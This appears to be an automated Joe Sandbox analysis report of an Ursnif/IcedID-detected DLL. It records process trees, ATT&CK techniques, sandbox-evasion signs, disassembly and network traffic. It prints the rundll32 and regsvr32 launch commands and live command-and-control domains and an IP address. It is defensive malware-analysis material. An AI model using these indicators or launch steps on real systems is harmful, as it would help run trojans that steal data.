Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe TID: 2084

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\loaddll64.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes	graph_0-4788
Source: C:\Windows\System32\regsvr32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes	graph_3-4958

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll64.exe	API coverage: 7.5 %
Source: C:\Windows\System32\regsvr32.exe	API coverage: 7.5 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 7.5 %

Source: C:\Windows\System32\loaddll64.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\System32\cmd.exe

File Volume queried: C:\Users\user\Desktop FullSizeInformation

Jump to behavior

Source: rundll32.exe, 00000004.00000002.765012505.000001C71475D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764834560.000001C71470B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 45.8.147.179 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: higmon.cyou

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00000001800045E8 GetSystemTimeAsFileTime,LeaveCriticalSection,

0_2_00000001800045E8

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	111 Process Injection	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	12 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Regsvr32	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	14 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll	22%	ReversingLabs	Win64.Trojan.IcedID

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://higmon.cyou/index.html7b9a	100%	Avira URL Cloud	malware
https://http://Mozilla/5.0	0%	Avira URL Cloud	safe
https://higmon.cyouhttps://prises.cyouR	0%	Avira URL Cloud	safe
https://higmon.cyou/index.html	100%	Avira URL Cloud	malware
https://higmon.cyou	100%	Avira URL Cloud	malware
https://higmon.cyou/	100%	Avira URL Cloud	malware
https://prises.cyou	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
higmon.cyou	45.8.147.179	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://higmon.cyou/index.html7b9a	rundll32.exe, 00000004.00000002.764723934.000001C7146DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://my.tealiumiq.com/urest/legacy/tagcompanion/getProfile?utid=	rundll32.exe, rundll32.exe, 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmp, c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll	false		high
https://higmon.cyou/index.html	rundll32.exe, 00000004.00000002.764961178.000001C714740000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764723934.000001C7146DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://http://Mozilla/5.0	loaddll64.exe, 00000000.00000002.265171862.000001FF43732000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246612763.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765260621.000001C716532000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247438709.000001817DA62000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://higmon.cyou	loaddll64.exe, 00000000.00000002.265165048.000001FF43730000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246608034.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765253557.000001C716530000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247434802.000001817DA60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://higmon.cyouhttps://prises.cyouR	rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://prises.cyou	loaddll64.exe, 00000000.00000002.265165048.000001FF43730000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246608034.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765253557.000001C716530000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247434802.000001817DA60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://higmon.cyou/	rundll32.exe, 00000004.00000002.764882863.000001C71471F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764961178.000001C714740000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.8.147.179	higmon.cyou	Russian Federation		44676	VMAGE-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	753126
Start date and time:	2022-11-24 10:48:03 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.exe (renamed file extension from exe to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winDLL@20/1@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 28.5% (good quality ratio 19.5%) Quality average: 40.1% Quality standard deviation: 34.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 58 Number of non-executed functions: 184
Cookbook Comments:	Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

Simulations

Behavior and APIs

Time	Type	Description
10:49:10	API Interceptor	1x Sleep call for process: loaddll64.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.8.147.179	https://michaelpageuk5ukln.com/michael-page	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
higmon.cyou	https://michaelpageuk5ukln.com/michael-page	Get hash	malicious	Browse	45.8.147.179

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VMAGE-ASRU	73WTGbC71V.exe	Get hash	malicious	Browse	45.8.144.232
	GpPP25HfBe.exe	Get hash	malicious	Browse	45.8.145.101
	vhVK5w3w9z.exe	Get hash	malicious	Browse	45.8.147.217
	6qC3krpy7W.exe	Get hash	malicious	Browse	45.89.54.50
	tNID7H5KEX.exe	Get hash	malicious	Browse	45.89.54.50
	SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.12780.9165.exe	Get hash	malicious	Browse	5.182.38.12
	pPKkXryP9Z.exe	Get hash	malicious	Browse	45.8.147.200
	Setup.exe	Get hash	malicious	Browse	45.8.147.121
	ncvfa8g3DH.exe	Get hash	malicious	Browse	45.8.144.183
	wOac7k4IQV.exe	Get hash	malicious	Browse	5.182.37.34
	SlackSetup.img	Get hash	malicious	Browse	45.8.144.15
	Setup.exe	Get hash	malicious	Browse	45.8.147.121
	THIN_MONKEY.exe	Get hash	malicious	Browse	45.8.147.121
	Setup.exe	Get hash	malicious	Browse	45.8.147.31
	b0AYw478Oz.exe	Get hash	malicious	Browse	5.182.36.101
	L5AoXj4g4X.exe	Get hash	malicious	Browse	5.182.36.101
	tkROtVzFhk.exe	Get hash	malicious	Browse	45.159.248.118
	fHDSifQWY9.exe	Get hash	malicious	Browse	45.89.55.178
	W4HI0bszxh.exe	Get hash	malicious	Browse	45.8.146.34
	LybP12K1FE.exe	Get hash	malicious	Browse	5.182.36.79

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\AEC4.tmp

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1558
Entropy (8bit):	4.6826840372617475
Encrypted:	false
SSDEEP:	48:kv2LdasaxnvlFaPMapaIaGaeau7agOV2av6Y8ZtaLaK:YlH
MD5:	7BEC34850EB3436F93D778F9C7353D0E
SHA1:	85BF8EE675F70D906E56E33442726602BDDACC27
SHA-256:	B779CF426802A01B413615C45A7730427AFB336C9BE53BD5B59D07AC2CAA4ED6
SHA-512:	8D44C53446E02FB053B6BEEB424C6C93F436695C87BCAF3C29543C55FBF18DB6D045FC9D80E62A55E48BF346093C3C4B241DAFFD8BA22E1F57D32B58866EA4AC
Malicious:	false
Preview:	Commands .. Volume in drive C has no label... Volume Serial Number is C820-F8D1.... Directory of C:\Users\user\Desktop....11/24/2022 10:48 AM <DIR> ...11/24/2022 10:48 AM <DIR> ....08/16/2022 02:37 PM 1,026 BJZFPPWAPT.mp3..08/16/2022 02:37 PM 1,026 BJZFPPWAPT.pdf..11/24/2022 10:48 AM 538,624 c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll..08/16/2022 02:37 PM <DIR> DUUDTUBZFW..08/16/2022 02:37 PM 1,026 DUUDTUBZFW.jpg..08/16/2022 02:37 PM <DIR> EEGWXUHVUG..08/16/2022 02:37 PM 1,026 EEGWXUHVUG.docx..08/16/2022 02:37 PM 1,026 EEGWXUHVUG.xlsx..08/16/2022 02:37 PM 1,026 EFOYFBOLXA.jpg..08/16/2022 02:37 PM 1,026 EFOYFBOLXA.xlsx..08/16/2022 02:37 PM 1,026 EWZCVGNOWT.mp3..07/23/2020 10:38 AM 2,660 Excel 2016.lnk..08/16/2022 02:37 PM 1,026 GRXZDKKVDB.png..08/16/2022 02:37 PM

Static File Info

General

File type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Entropy (8bit):	5.822863121964014
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 77.79% Windows Screen Saver (13104/52) 9.99% Win64 Executable (generic) (12005/4) 9.16% Generic Win/DOS Executable (2004/3) 1.53% DOS Executable Generic (2002/1) 1.53%
File name:	c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
File size:	538624
MD5:	590d96a7be55240ad868ebec78ce38f2
SHA1:	2aaf8acb010dfe83b808d7cc77f6821aaf44f3d2
SHA256:	846a8058cda54207aebb885f99dab0eab57529eb8dd94a3d57bbde2e93c4aad4
SHA512:	9360564b79909f934db9120315d981d3b2bf5e1f853baa0145d7ff9b0ac375d452d11d86f90dfe5547fdbd8f4f04a8f4fd2f73c50eab2df7bddb8207194d126a
SSDEEP:	6144:al+x6f16rj6MrQeQap0+TMPRxWer+YeZczE72q1i6qs6Yfs:a4416SCpXMPjWce+Eqq1i6qdas
TLSH:	D8B46D60B11030FFF6ABC039B1C66BD96279B113E9524DBEF05A98D48B8878B1177F19
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.}.1...1...1.......6...1...>.......0.......0.......0.......0...Rich1...........................PE..d.....2c.........." .......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x180001000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x180000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6332D8E8 [Tue Sep 27 11:05:12 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	16a8f4e2ed702e8523beef35ae5110a0

Entrypoint Preview

Instruction
jmp 00007FB3A0A0DDFCh
mov eax, 00000001h
add eax, 00000000h
jmp 00007FB3A0A0DDE2h
dec eax
add esp, 18h
ret
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 18h
jmp 00007FB3A0A0DDEDh
dec esp
mov dword ptr [esp+18h], eax
mov dword ptr [esp+10h], edx
jmp 00007FB3A0A0DDCCh
mov eax, dword ptr [esp+28h]
mov dword ptr [esp], eax
jmp 00007FB3A0A0DDB4h
jmp 00007FB3A0A0DF88h
mov byte ptr [esp+67h], 0000000Ah
add byte ptr [esp+67h], 00000066h
jmp 00007FB3A0A0DDFAh
mov byte ptr [esp+64h], 00000012h
add byte ptr [esp+64h], 00000026h
jmp 00007FB3A0A0DE34h
mov byte ptr [esp+66h], 0000000Dh
add byte ptr [esp+66h], 00000062h
jmp 00007FB3A0A0DDBEh
mov byte ptr [esp+68h], 00000034h
add byte ptr [esp+68h], 00000030h
jmp 00007FB3A0A0DE04h
add dx, 000Ah
xor ecx, ecx
jmp 00007FB3A0A0DFD3h
mov byte ptr [esp+6Bh], 0000001Eh
add byte ptr [esp+6Bh], 00000055h
jmp 00007FB3A0A0DDE2h
mov byte ptr [esp+6Ch], 00000000h
mov dx, 0011h
jmp 00007FB3A0A0DDC0h
mov byte ptr [esp+69h], 00000032h
add byte ptr [esp+69h], 00000047h
jmp 00007FB3A0A0DDE2h
mov byte ptr [esp+6Ah], 00000004h
add byte ptr [esp+6Ah], 00000070h
jmp 00007FB3A0A0DDB3h
mov byte ptr [esp+65h], 00000041h
add byte ptr [esp+65h], 0000002Bh
jmp 00007FB3A0A0DD84h
call 00007FB3A0A0DFD3h
xor eax, eax
jmp 00007FB3A0A0DEE0h
call dword ptr [00000F5Bh]
test eax, eax
jne 00007FB3A0A0DDD1h
jmp 00007FB3A0A0DF71h
call dword ptr [00000000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2090	0x144	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x21d4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x85000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x90	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfe0	0x1000	False	0.59130859375	DOS executable (COM)	5.742356131814896	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x41a	0x600	False	0.380859375	COM executable for DOS	3.47027698168912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.sedt	0x3000	0x81ad6	0x81c00	False	0.3247832369942196	data	5.775703252117877	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x85000	0x1e0	0x200	False	0.52734375	data	4.719348272345726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x85060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	VirtualAlloc, GetConsoleMode, PeekConsoleInputA, ReadConsoleA, FlushConsoleInputBuffer, GetConsoleScreenBufferInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, ReadConsoleOutputA, GetCurrentConsoleFont
USER32.dll	GetScrollBarInfo, DefMDIChildProcW
USP10.dll	ScriptXtoCP, ScriptString_pSize, ScriptTextOut

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x180001030
FgnfMvSNFULXZx	2	0x180001e60
KVpawdrrKTUjeZuk	3	0x180001e3c
LaEiyoOgoiNTr	4	0x180001f5c
WOlqmpYHUmo	5	0x180001e84
XEuCWLzwGSc	6	0x180001ea8
ZdXkUtuwLqhmt	7	0x180001f38
aLcPpKozZItuf	8	0x180001f14
cNtNVfZnIZvqyMq	9	0x180001ecc
hbOIyYikdaBLyqU	10	0x180001ef0
zJhDuUvYOmGa	11	0x180001e18

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.78.8.8.860326532039637 11/24/22-10:49:03.324067	UDP	2039637	ET TROJAN Observed DNS Query to Ursnif Domain (higmon .cyou)	60326	53	192.168.2.7	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 10:49:03.362545013 CET	49708	443	192.168.2.7	45.8.147.179
Nov 24, 2022 10:49:03.362597942 CET	443	49708	45.8.147.179	192.168.2.7
Nov 24, 2022 10:49:03.362678051 CET	49708	443	192.168.2.7	45.8.147.179
Nov 24, 2022 10:49:03.368077993 CET	49708	443	192.168.2.7	45.8.147.179
Nov 24, 2022 10:49:03.368100882 CET	443	49708	45.8.147.179	192.168.2.7
Nov 24, 2022 10:51:14.267262936 CET	443	49708	45.8.147.179	192.168.2.7
Nov 24, 2022 10:51:14.270287037 CET	49719	443	192.168.2.7	45.8.147.179
Nov 24, 2022 10:51:14.270345926 CET	443	49719	45.8.147.179	192.168.2.7
Nov 24, 2022 10:51:14.270559072 CET	49719	443	192.168.2.7	45.8.147.179
Nov 24, 2022 10:51:14.272161007 CET	49719	443	192.168.2.7	45.8.147.179
Nov 24, 2022 10:51:14.272178888 CET	443	49719	45.8.147.179	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 10:49:03.324067116 CET	60326	53	192.168.2.7	8.8.8.8
Nov 24, 2022 10:49:03.342747927 CET	53	60326	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2022 10:49:03.324067116 CET	192.168.2.7	8.8.8.8	0xe611	Standard query (0)	higmon.cyou	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 24, 2022 10:49:03.342747927 CET	8.8.8.8	192.168.2.7	0xe611	No error (0)	higmon.cyou		45.8.147.179	A (IP address)	IN (0x0001)	false

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll64.exePID: 2512, Parent PID: 3320

General

Target ID:	0
Start time:	10:49:00
Start date:	24/11/2022
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll"
Imagebase:	0x7ff6962f0000
File size:	139776 bytes
MD5 hash:	C676FC0263EDD17D4CE7D644B8F3FCD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5992, Parent PID: 2512

General

Target ID:	1
Start time:	10:49:00
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5972, Parent PID: 2512

General

Target ID:	2
Start time:	10:49:00
Start date:	24/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
Imagebase:	0x7ff7651b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5952, Parent PID: 2512

General

Target ID:	3
Start time:	10:49:00
Start date:	24/11/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
Imagebase:	0x7ff7ccb40000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5932, Parent PID: 5972

General

Target ID:	4
Start time:	10:49:00
Start date:	24/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
Imagebase:	0x7ff739200000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5960, Parent PID: 2512

General

Target ID:	5
Start time:	10:49:00
Start date:	24/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer
Imagebase:	0x7ff739200000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3308, Parent PID: 5932

General

Target ID:	6
Start time:	10:49:03
Start date:	24/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c "echo Commands" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp
Imagebase:	0x7ff7651b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3828, Parent PID: 3308

General

Target ID:	7
Start time:	10:49:03
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6072, Parent PID: 2512

General

Target ID:	8
Start time:	10:49:03
Start date:	24/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
